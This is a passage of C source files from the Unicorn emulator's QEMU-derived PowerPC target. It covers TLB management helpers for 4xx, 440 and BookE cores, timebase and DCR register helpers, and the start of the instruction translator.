'v' : '-', (int)tlb->PID); } target_ulong helper_4xx_tlbsx(CPUPPCState *env, target_ulong address) { return ppcemb_tlb_search(env, address, env->spr[SPR_40x_PID]); } /* PowerPC 440 TLB management */ void helper_440_tlbwe(CPUPPCState *env, uint32_t word, target_ulong entry, target_ulong value) { ppcemb_tlb_t *tlb; target_ulong EPN, RPN, size; int do_flush_tlbs; LOG_SWTLB("%s word %d entry %d value " TARGET_FMT_lx "\n", __func__, word, (int)entry, value); do_flush_tlbs = 0; entry &= 0x3F; tlb = &env->tlb.tlbe[entry]; switch (word) { default: /* Just here to please gcc */ case 0: EPN = value & 0xFFFFFC00; if ((tlb->prot & PAGE_VALID) && EPN != tlb->EPN) { do_flush_tlbs = 1; } tlb->EPN = EPN; size = booke_tlb_to_page_size((value >> 4) & 0xF); if ((tlb->prot & PAGE_VALID) && tlb->size < size) { do_flush_tlbs = 1; } tlb->size = size; tlb->attr &= ~0x1; tlb->attr |= (value >> 8) & 1; if (value & 0x200) { tlb->prot |= PAGE_VALID; } else { if (tlb->prot & PAGE_VALID) { tlb->prot &= ~PAGE_VALID; do_flush_tlbs = 1; } } tlb->PID = env->spr[SPR_440_MMUCR] & 0x000000FF; if (do_flush_tlbs) { tlb_flush(env_cpu(env)); } break; case 1: RPN = value & 0xFFFFFC0F; if ((tlb->prot & PAGE_VALID) && tlb->RPN != RPN) { tlb_flush(env_cpu(env)); } tlb->RPN = RPN; break; case 2: tlb->attr = (tlb->attr & 0x1) | (value & 0x0000FF00); tlb->prot = tlb->prot & PAGE_VALID; if (value & 0x1) { tlb->prot |= PAGE_READ << 4; } if (value & 0x2) { tlb->prot |= PAGE_WRITE << 4; } if (value & 0x4) { tlb->prot |= PAGE_EXEC << 4; } if (value & 0x8) { tlb->prot |= PAGE_READ; } if (value & 0x10) { tlb->prot |= PAGE_WRITE; } if (value & 0x20) { tlb->prot |= PAGE_EXEC; } break; } } target_ulong helper_440_tlbre(CPUPPCState *env, uint32_t word, target_ulong entry) { ppcemb_tlb_t *tlb; target_ulong ret; int size; entry &= 0x3F; tlb = &env->tlb.tlbe[entry]; switch (word) { default: /* Just here to please gcc */ case 0: ret = tlb->EPN; size = booke_page_size_to_tlb(tlb->size); if (size < 0 || size > 0xF) { size = 1; } ret |= size << 4; if (tlb->attr & 0x1) { ret |= 0x100; } if (tlb->prot & PAGE_VALID) { ret |= 0x200; } env->spr[SPR_440_MMUCR] &= ~0x000000FF; env->spr[SPR_440_MMUCR] |= tlb->PID; break; case 1: ret = tlb->RPN; break; case 2: ret = tlb->attr & ~0x1; if (tlb->prot & (PAGE_READ << 4)) { ret |= 0x1; } if (tlb->prot & (PAGE_WRITE << 4)) { ret |= 0x2; } if (tlb->prot & (PAGE_EXEC << 4)) { ret |= 0x4; } if (tlb->prot & PAGE_READ) { ret |= 0x8; } if (tlb->prot & PAGE_WRITE) { ret |= 0x10; } if (tlb->prot & PAGE_EXEC) { ret |= 0x20; } break; } return ret; } target_ulong helper_440_tlbsx(CPUPPCState *env, target_ulong address) { return ppcemb_tlb_search(env, address, env->spr[SPR_440_MMUCR] & 0xFF); } /* PowerPC BookE 2.06 TLB management */ static ppcmas_tlb_t *booke206_cur_tlb(CPUPPCState *env) { uint32_t tlbncfg = 0; int esel = (env->spr[SPR_BOOKE_MAS0] & MAS0_ESEL_MASK) >> MAS0_ESEL_SHIFT; int ea = (env->spr[SPR_BOOKE_MAS2] & MAS2_EPN_MASK); int tlb; tlb = (env->spr[SPR_BOOKE_MAS0] & MAS0_TLBSEL_MASK) >> MAS0_TLBSEL_SHIFT; tlbncfg = env->spr[SPR_BOOKE_TLB0CFG + tlb]; if ((tlbncfg & TLBnCFG_HES) && (env->spr[SPR_BOOKE_MAS0] & MAS0_HES)) { cpu_abort(env_cpu(env), "we don't support HES yet\n"); } return booke206_get_tlbm(env, tlb, ea, esel); } void helper_booke_setpid(CPUPPCState *env, uint32_t pidn, target_ulong pid) { env->spr[pidn] = pid; /* changing PIDs mean we're in a different address space now */ tlb_flush(env_cpu(env)); } void helper_booke_set_eplc(CPUPPCState *env, target_ulong val) { env->spr[SPR_BOOKE_EPLC] = val & EPID_MASK; 
tlb_flush_by_mmuidx(env_cpu(env), 1 << PPC_TLB_EPID_LOAD); } void helper_booke_set_epsc(CPUPPCState *env, target_ulong val) { env->spr[SPR_BOOKE_EPSC] = val & EPID_MASK; tlb_flush_by_mmuidx(env_cpu(env), 1 << PPC_TLB_EPID_STORE); } static inline void flush_page(CPUPPCState *env, ppcmas_tlb_t *tlb) { if (booke206_tlb_to_page_size(env, tlb) == TARGET_PAGE_SIZE) { tlb_flush_page(env_cpu(env), tlb->mas2 & MAS2_EPN_MASK); } else { tlb_flush(env_cpu(env)); } } void helper_booke206_tlbwe(CPUPPCState *env) { uint32_t tlbncfg, tlbn; ppcmas_tlb_t *tlb; uint32_t size_tlb, size_ps; target_ulong mask; switch (env->spr[SPR_BOOKE_MAS0] & MAS0_WQ_MASK) { case MAS0_WQ_ALWAYS: /* good to go, write that entry */ break; case MAS0_WQ_COND: /* XXX check if reserved */ if (0) { return; } break; case MAS0_WQ_CLR_RSRV: /* XXX clear entry */ return; default: /* no idea what to do */ return; } if (((env->spr[SPR_BOOKE_MAS0] & MAS0_ATSEL) == MAS0_ATSEL_LRAT) && !msr_gs) { /* XXX we don't support direct LRAT setting yet */ fprintf(stderr, "cpu: don't support LRAT setting yet\n"); return; } tlbn = (env->spr[SPR_BOOKE_MAS0] & MAS0_TLBSEL_MASK) >> MAS0_TLBSEL_SHIFT; tlbncfg = env->spr[SPR_BOOKE_TLB0CFG + tlbn]; tlb = booke206_cur_tlb(env); if (!tlb) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_INVAL, GETPC()); } /* check that we support the targeted size */ size_tlb = (env->spr[SPR_BOOKE_MAS1] & MAS1_TSIZE_MASK) >> MAS1_TSIZE_SHIFT; size_ps = booke206_tlbnps(env, tlbn); if ((env->spr[SPR_BOOKE_MAS1] & MAS1_VALID) && (tlbncfg & TLBnCFG_AVAIL) && !(size_ps & (1 << size_tlb))) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_INVAL, GETPC()); } if (msr_gs) { cpu_abort(env_cpu(env), "missing HV implementation\n"); } if (tlb->mas1 & MAS1_VALID) { /* * Invalidate the page in QEMU TLB if it was a valid entry. * * In "PowerPC e500 Core Family Reference Manual, Rev. 1", * Section "12.4.2 TLB Write Entry (tlbwe) Instruction": * (https://www.nxp.com/docs/en/reference-manual/E500CORERM.pdf) * * "Note that when an L2 TLB entry is written, it may be displacing an * already valid entry in the same L2 TLB location (a victim). If a * valid L1 TLB entry corresponds to the L2 MMU victim entry, that L1 * TLB entry is automatically invalidated." */ flush_page(env, tlb); } tlb->mas7_3 = ((uint64_t)env->spr[SPR_BOOKE_MAS7] << 32) | env->spr[SPR_BOOKE_MAS3]; tlb->mas1 = env->spr[SPR_BOOKE_MAS1]; if ((env->spr[SPR_MMUCFG] & MMUCFG_MAVN) == MMUCFG_MAVN_V2) { /* For TLB which has a fixed size TSIZE is ignored with MAV2 */ booke206_fixed_size_tlbn(env, tlbn, tlb); } else { if (!(tlbncfg & TLBnCFG_AVAIL)) { /* force !AVAIL TLB entries to correct page size */ tlb->mas1 &= ~MAS1_TSIZE_MASK; /* XXX can be configured in MMUCSR0 */ tlb->mas1 |= (tlbncfg & TLBnCFG_MINSIZE) >> 12; } } /* Make a mask from TLB size to discard invalid bits in EPN field */ mask = ~(booke206_tlb_to_page_size(env, tlb) - 1); /* Add a mask for page attributes */ mask |= MAS2_ACM | MAS2_VLE | MAS2_W | MAS2_I | MAS2_M | MAS2_G | MAS2_E; if (!msr_cm) { /* * Executing a tlbwe instruction in 32-bit mode will set bits * 0:31 of the TLB EPN field to zero. 
*/ mask &= 0xffffffff; } tlb->mas2 = env->spr[SPR_BOOKE_MAS2] & mask; if (!(tlbncfg & TLBnCFG_IPROT)) { /* no IPROT supported by TLB */ tlb->mas1 &= ~MAS1_IPROT; } flush_page(env, tlb); } static inline void booke206_tlb_to_mas(CPUPPCState *env, ppcmas_tlb_t *tlb) { int tlbn = booke206_tlbm_to_tlbn(env, tlb); int way = booke206_tlbm_to_way(env, tlb); env->spr[SPR_BOOKE_MAS0] = tlbn << MAS0_TLBSEL_SHIFT; env->spr[SPR_BOOKE_MAS0] |= way << MAS0_ESEL_SHIFT; env->spr[SPR_BOOKE_MAS0] |= env->last_way << MAS0_NV_SHIFT; env->spr[SPR_BOOKE_MAS1] = tlb->mas1; env->spr[SPR_BOOKE_MAS2] = tlb->mas2; env->spr[SPR_BOOKE_MAS3] = tlb->mas7_3; env->spr[SPR_BOOKE_MAS7] = tlb->mas7_3 >> 32; } void helper_booke206_tlbre(CPUPPCState *env) { ppcmas_tlb_t *tlb = NULL; tlb = booke206_cur_tlb(env); if (!tlb) { env->spr[SPR_BOOKE_MAS1] = 0; } else { booke206_tlb_to_mas(env, tlb); } } void helper_booke206_tlbsx(CPUPPCState *env, target_ulong address) { ppcmas_tlb_t *tlb = NULL; int i, j; hwaddr raddr; uint32_t spid, sas; spid = (env->spr[SPR_BOOKE_MAS6] & MAS6_SPID_MASK) >> MAS6_SPID_SHIFT; sas = env->spr[SPR_BOOKE_MAS6] & MAS6_SAS; for (i = 0; i < BOOKE206_MAX_TLBN; i++) { int ways = booke206_tlb_ways(env, i); for (j = 0; j < ways; j++) { tlb = booke206_get_tlbm(env, i, address, j); if (!tlb) { continue; } if (ppcmas_tlb_check(env, tlb, &raddr, address, spid)) { continue; } if (sas != ((tlb->mas1 & MAS1_TS) >> MAS1_TS_SHIFT)) { continue; } booke206_tlb_to_mas(env, tlb); return; } } /* no entry found, fill with defaults */ env->spr[SPR_BOOKE_MAS0] = env->spr[SPR_BOOKE_MAS4] & MAS4_TLBSELD_MASK; env->spr[SPR_BOOKE_MAS1] = env->spr[SPR_BOOKE_MAS4] & MAS4_TSIZED_MASK; env->spr[SPR_BOOKE_MAS2] = env->spr[SPR_BOOKE_MAS4] & MAS4_WIMGED_MASK; env->spr[SPR_BOOKE_MAS3] = 0; env->spr[SPR_BOOKE_MAS7] = 0; if (env->spr[SPR_BOOKE_MAS6] & MAS6_SAS) { env->spr[SPR_BOOKE_MAS1] |= MAS1_TS; } env->spr[SPR_BOOKE_MAS1] |= (env->spr[SPR_BOOKE_MAS6] >> 16) << MAS1_TID_SHIFT; /* next victim logic */ env->spr[SPR_BOOKE_MAS0] |= env->last_way << MAS0_ESEL_SHIFT; env->last_way++; env->last_way &= booke206_tlb_ways(env, 0) - 1; env->spr[SPR_BOOKE_MAS0] |= env->last_way << MAS0_NV_SHIFT; } static inline void booke206_invalidate_ea_tlb(CPUPPCState *env, int tlbn, uint32_t ea) { int i; int ways = booke206_tlb_ways(env, tlbn); target_ulong mask; for (i = 0; i < ways; i++) { ppcmas_tlb_t *tlb = booke206_get_tlbm(env, tlbn, ea, i); if (!tlb) { continue; } mask = ~(booke206_tlb_to_page_size(env, tlb) - 1); if (((tlb->mas2 & MAS2_EPN_MASK) == (ea & mask)) && !(tlb->mas1 & MAS1_IPROT)) { tlb->mas1 &= ~MAS1_VALID; } } } void helper_booke206_tlbivax(CPUPPCState *env, target_ulong address) { CPUState *cs = env_cpu(env); if (address & 0x4) { /* flush all entries */ if (address & 0x8) { /* flush all of TLB1 */ booke206_flush_tlb(env, BOOKE206_FLUSH_TLB1, 1); } else { /* flush all of TLB0 */ booke206_flush_tlb(env, BOOKE206_FLUSH_TLB0, 0); } return; } if (address & 0x8) { /* flush TLB1 entries */ booke206_invalidate_ea_tlb(env, 1, address); tlb_flush(cs); } else { /* flush TLB0 entries */ booke206_invalidate_ea_tlb(env, 0, address); tlb_flush_page(cs, address & MAS2_EPN_MASK); } } void helper_booke206_tlbilx0(CPUPPCState *env, target_ulong address) { /* XXX missing LPID handling */ booke206_flush_tlb(env, -1, 1); } void helper_booke206_tlbilx1(CPUPPCState *env, target_ulong address) { int i, j; int tid = (env->spr[SPR_BOOKE_MAS6] & MAS6_SPID); ppcmas_tlb_t *tlb = env->tlb.tlbm; int tlb_size; /* XXX missing LPID handling */ for (i = 0; i < BOOKE206_MAX_TLBN; 
i++) {
        tlb_size = booke206_tlb_size(env, i);
        for (j = 0; j < tlb_size; j++) {
            if (!(tlb[j].mas1 & MAS1_IPROT) &&
                ((tlb[j].mas1 & MAS1_TID_MASK) == tid)) {
                tlb[j].mas1 &= ~MAS1_VALID;
            }
        }
        tlb += booke206_tlb_size(env, i);
    }
    tlb_flush(env_cpu(env));
}

void helper_booke206_tlbilx3(CPUPPCState *env, target_ulong address)
{
    int i, j;
    ppcmas_tlb_t *tlb;
    int tid = (env->spr[SPR_BOOKE_MAS6] & MAS6_SPID);
    int pid = tid >> MAS6_SPID_SHIFT;
    int sgs = env->spr[SPR_BOOKE_MAS5] & MAS5_SGS;
    int ind = (env->spr[SPR_BOOKE_MAS6] & MAS6_SIND) ? MAS1_IND : 0;
    /* XXX check for unsupported isize and raise an invalid opcode then */
    int size = env->spr[SPR_BOOKE_MAS6] & MAS6_ISIZE_MASK;
    /* XXX implement MAV2 handling */
    bool mav2 = false;

    /* XXX missing LPID handling */
    /* flush by pid and ea */
    for (i = 0; i < BOOKE206_MAX_TLBN; i++) {
        int ways = booke206_tlb_ways(env, i);

        for (j = 0; j < ways; j++) {
            tlb = booke206_get_tlbm(env, i, address, j);
            if (!tlb) {
                continue;
            }
            if ((ppcmas_tlb_check(env, tlb, NULL, address, pid) != 0) ||
                (tlb->mas1 & MAS1_IPROT) ||
                ((tlb->mas1 & MAS1_IND) != ind) ||
                ((tlb->mas8 & MAS8_TGS) != sgs)) {
                continue;
            }
            if (mav2 && ((tlb->mas1 & MAS1_TSIZE_MASK) != size)) {
                /* XXX only check when MMUCFG[TWC] || TLBnCFG[HES] */
                continue;
            }
            /* XXX e500mc doesn't match SAS, but other cores might */
            tlb->mas1 &= ~MAS1_VALID;
        }
    }
    tlb_flush(env_cpu(env));
}

void helper_booke206_tlbflush(CPUPPCState *env, target_ulong type)
{
    int flags = 0;

    if (type & 2) {
        flags |= BOOKE206_FLUSH_TLB1;
    }

    if (type & 4) {
        flags |= BOOKE206_FLUSH_TLB0;
    }

    booke206_flush_tlb(env, flags, 1);
}

void helper_check_tlb_flush_local(CPUPPCState *env)
{
    check_tlb_flush(env, false);
}

void helper_check_tlb_flush_global(CPUPPCState *env)
{
    check_tlb_flush(env, true);
}

/*****************************************************************************/

bool ppc_cpu_tlb_fill(CPUState *cs, vaddr addr, int size,
                      MMUAccessType access_type, int mmu_idx,
                      bool probe, uintptr_t retaddr)
{
    PowerPCCPU *cpu = POWERPC_CPU(cs);
    PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cs);
    CPUPPCState *env = &cpu->env;
    int ret;

    if (pcc->handle_mmu_fault) {
        ret = pcc->handle_mmu_fault(cpu, addr, access_type, mmu_idx);
    } else {
        ret = cpu_ppc_handle_mmu_fault(env, addr, access_type, mmu_idx);
    }
    if (unlikely(ret != 0)) {
        if (probe) {
            return false;
        }
        raise_exception_err_ra(env, cs->exception_index, env->error_code,
                               retaddr);
    }
    return true;
}

unicorn-2.1.1/qemu/target/ppc/timebase_helper.c

/*
 * PowerPC emulation helpers for QEMU.
* * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" /*****************************************************************************/ /* SPR accesses */ target_ulong helper_load_tbl(CPUPPCState *env) { return (target_ulong)cpu_ppc_load_tbl(env); } target_ulong helper_load_tbu(CPUPPCState *env) { return cpu_ppc_load_tbu(env); } target_ulong helper_load_atbl(CPUPPCState *env) { return (target_ulong)cpu_ppc_load_atbl(env); } target_ulong helper_load_atbu(CPUPPCState *env) { return cpu_ppc_load_atbu(env); } target_ulong helper_load_vtb(CPUPPCState *env) { return cpu_ppc_load_vtb(env); } #if defined(TARGET_PPC64) target_ulong helper_load_purr(CPUPPCState *env) { return (target_ulong)cpu_ppc_load_purr(env); } void helper_store_purr(CPUPPCState *env, target_ulong val) { cpu_ppc_store_purr(env, val); } #endif target_ulong helper_load_601_rtcl(CPUPPCState *env) { return cpu_ppc601_load_rtcl(env); } target_ulong helper_load_601_rtcu(CPUPPCState *env) { return cpu_ppc601_load_rtcu(env); } void helper_store_tbl(CPUPPCState *env, target_ulong val) { cpu_ppc_store_tbl(env, val); } void helper_store_tbu(CPUPPCState *env, target_ulong val) { cpu_ppc_store_tbu(env, val); } void helper_store_atbl(CPUPPCState *env, target_ulong val) { cpu_ppc_store_atbl(env, val); } void helper_store_atbu(CPUPPCState *env, target_ulong val) { cpu_ppc_store_atbu(env, val); } void helper_store_601_rtcl(CPUPPCState *env, target_ulong val) { cpu_ppc601_store_rtcl(env, val); } void helper_store_601_rtcu(CPUPPCState *env, target_ulong val) { cpu_ppc601_store_rtcu(env, val); } target_ulong helper_load_decr(CPUPPCState *env) { return cpu_ppc_load_decr(env); } void helper_store_decr(CPUPPCState *env, target_ulong val) { cpu_ppc_store_decr(env, val); } target_ulong helper_load_hdecr(CPUPPCState *env) { return cpu_ppc_load_hdecr(env); } void helper_store_hdecr(CPUPPCState *env, target_ulong val) { cpu_ppc_store_hdecr(env, val); } void helper_store_vtb(CPUPPCState *env, target_ulong val) { cpu_ppc_store_vtb(env, val); } void helper_store_tbu40(CPUPPCState *env, target_ulong val) { cpu_ppc_store_tbu40(env, val); } target_ulong helper_load_40x_pit(CPUPPCState *env) { return load_40x_pit(env); } void helper_store_40x_pit(CPUPPCState *env, target_ulong val) { store_40x_pit(env, val); } void helper_store_booke_tcr(CPUPPCState *env, target_ulong val) { store_booke_tcr(env, val); } void helper_store_booke_tsr(CPUPPCState *env, target_ulong val) { store_booke_tsr(env, val); } /*****************************************************************************/ /* Embedded PowerPC specific helpers */ /* XXX: to be improved to check access rights when in user-mode */ target_ulong helper_load_dcr(CPUPPCState *env, target_ulong dcrn) { uint32_t val = 0; if (unlikely(env->dcr_env == NULL)) { qemu_log_mask(LOG_GUEST_ERROR, 
"No DCR environment\n"); raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_INVAL, GETPC()); } else { int ret; ret = ppc_dcr_read(env->dcr_env, (uint32_t)dcrn, &val); if (unlikely(ret != 0)) { #if 0 qemu_log_mask(LOG_GUEST_ERROR, "DCR read error %d %03x\n", (uint32_t)dcrn, (uint32_t)dcrn); #endif raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_PRIV_REG, GETPC()); } } return val; } void helper_store_dcr(CPUPPCState *env, target_ulong dcrn, target_ulong val) { if (unlikely(env->dcr_env == NULL)) { #if 0 qemu_log_mask(LOG_GUEST_ERROR, "No DCR environment\n"); #endif raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_INVAL, GETPC()); } else { int ret; ret = ppc_dcr_write(env->dcr_env, (uint32_t)dcrn, (uint32_t)val); if (unlikely(ret != 0)) { #if 0 qemu_log_mask(LOG_GUEST_ERROR, "DCR write error %d %03x\n", (uint32_t)dcrn, (uint32_t)dcrn); #endif raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_PRIV_REG, GETPC()); } } } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate.c�����������������������������������������������������������0000664�0000000�0000000�00001037320�14675241067�0020372�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC emulation for qemu: main translation routines. * * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright (C) 2011 Freescale Semiconductor, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "tcg/tcg-op-gvec.h" #include "qemu/host-utils.h" #include "exec/cpu_ldst.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "exec/translator.h" #include "qemu/atomic128.h" #define CPU_SINGLE_STEP 0x1 #define CPU_BRANCH_STEP 0x2 #define GDBSTUB_SINGLE_STEP 0x4 /* Include definitions for instructions classes and implementations flags */ /* #define PPC_DEBUG_DISAS */ /* #define DO_PPC_STATISTICS */ #ifdef PPC_DEBUG_DISAS # define LOG_DISAS(...) qemu_log_mask(CPU_LOG_TB_IN_ASM, ## __VA_ARGS__) #else # define LOG_DISAS(...) 
do { } while (0) #endif /*****************************************************************************/ /* Code translation helpers */ /* global register indexes */ static char cpu_reg_names[10 * 3 + 22 * 4 /* GPR */ + 10 * 4 + 22 * 5 /* SPE GPRh */ + 8 * 5 /* CRF */]; static TCGv cpu_gpr[32]; static TCGv cpu_gprh[32]; static TCGv_i32 cpu_crf[8]; static TCGv cpu_nip; static TCGv cpu_msr; static TCGv cpu_ctr; static TCGv cpu_lr; #if defined(TARGET_PPC64) static TCGv cpu_cfar; #endif static TCGv cpu_xer, cpu_so, cpu_ov, cpu_ca, cpu_ov32, cpu_ca32; static TCGv cpu_reserve; static TCGv cpu_reserve_val; static TCGv cpu_fpscr; static TCGv_i32 cpu_access_type; #include "exec/gen-icount.h" void ppc_translate_init(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; int i; char *p; size_t cpu_reg_names_size; p = cpu_reg_names; cpu_reg_names_size = sizeof(cpu_reg_names); for (i = 0; i < 8; i++) { snprintf(p, cpu_reg_names_size, "crf%d", i); cpu_crf[i] = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, crf[i]), p); p += 5; cpu_reg_names_size -= 5; } for (i = 0; i < 32; i++) { snprintf(p, cpu_reg_names_size, "r%d", i); cpu_gpr[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, gpr[i]), p); p += (i < 10) ? 3 : 4; cpu_reg_names_size -= (i < 10) ? 3 : 4; snprintf(p, cpu_reg_names_size, "r%dH", i); cpu_gprh[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, gprh[i]), p); p += (i < 10) ? 4 : 5; cpu_reg_names_size -= (i < 10) ? 4 : 5; } cpu_nip = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, nip), "nip"); cpu_msr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, msr), "msr"); cpu_ctr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, ctr), "ctr"); cpu_lr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, lr), "lr"); #if defined(TARGET_PPC64) cpu_cfar = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, cfar), "cfar"); #endif cpu_xer = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, xer), "xer"); cpu_so = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, so), "SO"); cpu_ov = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, ov), "OV"); cpu_ca = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, ca), "CA"); cpu_ov32 = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, ov32), "OV32"); cpu_ca32 = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, ca32), "CA32"); cpu_reserve = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, reserve_addr), "reserve_addr"); cpu_reserve_val = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, reserve_val), "reserve_val"); cpu_fpscr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, fpscr), "fpscr"); cpu_access_type = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, access_type), "access_type"); } /* internal defines */ struct DisasContext { DisasContextBase base; uint32_t opcode; uint32_t exception; /* Routine used to access memory */ bool pr, hv, dr, le_mode; bool lazy_tlb_flush; bool need_access_type; int mem_idx; int access_type; /* Translation flags */ MemOp default_tcg_memop_mask; #if defined(TARGET_PPC64) bool sf_mode; bool has_cfar; #endif bool fpu_enabled; bool altivec_enabled; bool vsx_enabled; bool spe_enabled; bool tm_enabled; bool gtse; ppc_spr_t *spr_cb; /* Needed to check rights for mfspr/mtspr */ int 
singlestep_enabled; uint32_t flags; uint64_t insns_flags; uint64_t insns_flags2; // Unicorn struct uc_struct *uc; }; /* Return true iff byteswap is needed in a scalar memop */ static inline bool need_byteswap(const DisasContext *ctx) { #if defined(TARGET_WORDS_BIGENDIAN) return ctx->le_mode; #else return !ctx->le_mode; #endif } /* True when active word size < size of target_long. */ #ifdef TARGET_PPC64 # define NARROW_MODE(C) (!(C)->sf_mode) #else # define NARROW_MODE(C) 0 #endif struct opc_handler_t { /* invalid bits for instruction 1 (Rc(opcode) == 0) */ uint32_t inval1; /* invalid bits for instruction 2 (Rc(opcode) == 1) */ uint32_t inval2; /* instruction type */ uint64_t type; /* extended instruction type */ uint64_t type2; /* handler */ void (*handler)(DisasContext *ctx); #if defined(DO_PPC_STATISTICS) || defined(PPC_DUMP_CPU) const char *oname; #endif #if defined(DO_PPC_STATISTICS) uint64_t count; #endif }; /* SPR load/store helpers */ static inline void gen_load_spr(TCGContext *tcg_ctx, TCGv t, int reg) { tcg_gen_ld_tl(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUPPCState, spr[reg])); } static inline void gen_store_spr(TCGContext *tcg_ctx, int reg, TCGv t) { tcg_gen_st_tl(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUPPCState, spr[reg])); } static inline void gen_set_access_type(DisasContext *ctx, int access_type) { if (ctx->need_access_type && ctx->access_type != access_type) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, cpu_access_type, access_type); ctx->access_type = access_type; } } static inline void gen_update_nip(DisasContext *ctx, target_ulong nip) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (NARROW_MODE(ctx)) { nip = (uint32_t)nip; } tcg_gen_movi_tl(tcg_ctx, cpu_nip, nip); } static void gen_exception_err(DisasContext *ctx, uint32_t excp, uint32_t error) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0, t1; /* * These are all synchronous exceptions, we set the PC back to the * faulting instruction */ if (ctx->exception == POWERPC_EXCP_NONE) { gen_update_nip(ctx, ctx->base.pc_next - 4); } t0 = tcg_const_i32(tcg_ctx, excp); t1 = tcg_const_i32(tcg_ctx, error); #ifdef UNICORN_ARCH_POSTFIX glue(gen_helper_raise_exception_err, UNICORN_ARCH_POSTFIX)(tcg_ctx, tcg_ctx->cpu_env, t0, t1); #else gen_helper_raise_exception_err(tcg_ctx, tcg_ctx->cpu_env, t0, t1); #endif tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); ctx->exception = (excp); } static void gen_exception(DisasContext *ctx, uint32_t excp) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; /* * These are all synchronous exceptions, we set the PC back to the * faulting instruction */ if (ctx->exception == POWERPC_EXCP_NONE) { gen_update_nip(ctx, ctx->base.pc_next - 4); } t0 = tcg_const_i32(tcg_ctx, excp); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); ctx->exception = (excp); } static void gen_exception_nip(DisasContext *ctx, uint32_t excp, target_ulong nip) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; gen_update_nip(ctx, nip); t0 = tcg_const_i32(tcg_ctx, excp); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); ctx->exception = (excp); } /* * Tells the caller what is the appropriate exception to generate and prepares * SPR registers for this exception. * * The exception can be either POWERPC_EXCP_TRACE (on most PowerPCs) or * POWERPC_EXCP_DEBUG (on BookE). 
